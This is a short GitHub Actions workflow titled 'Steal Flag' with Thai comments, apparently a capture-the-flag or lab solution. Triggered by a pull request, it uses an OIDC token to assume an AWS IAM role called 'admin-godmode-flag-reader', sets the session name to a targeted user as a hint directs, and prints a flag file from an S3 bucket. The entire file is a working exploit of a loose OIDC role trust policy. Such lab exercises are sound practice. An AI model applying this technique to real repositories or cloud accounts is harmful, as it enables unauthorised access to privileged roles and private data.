name: Steal Flag
on:
  pull_request:        # เปลี่ยนจาก workflow_dispatch หรือ push เป็นตัวนี้
    branches: [ main ] # หรือ master แล้วแต่ repo

permissions:
  id-token: write
  contents: read

jobs:
  grab-flag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875
          role-session-name: secops-lab78  # ยึดตาม Hint: ใส่ชื่อ User เป้าหมาย
          aws-region: ap-southeast-1

      - name: Show flag
        run: aws s3 cp s3://oh-i-really-do-care/flag.txt -
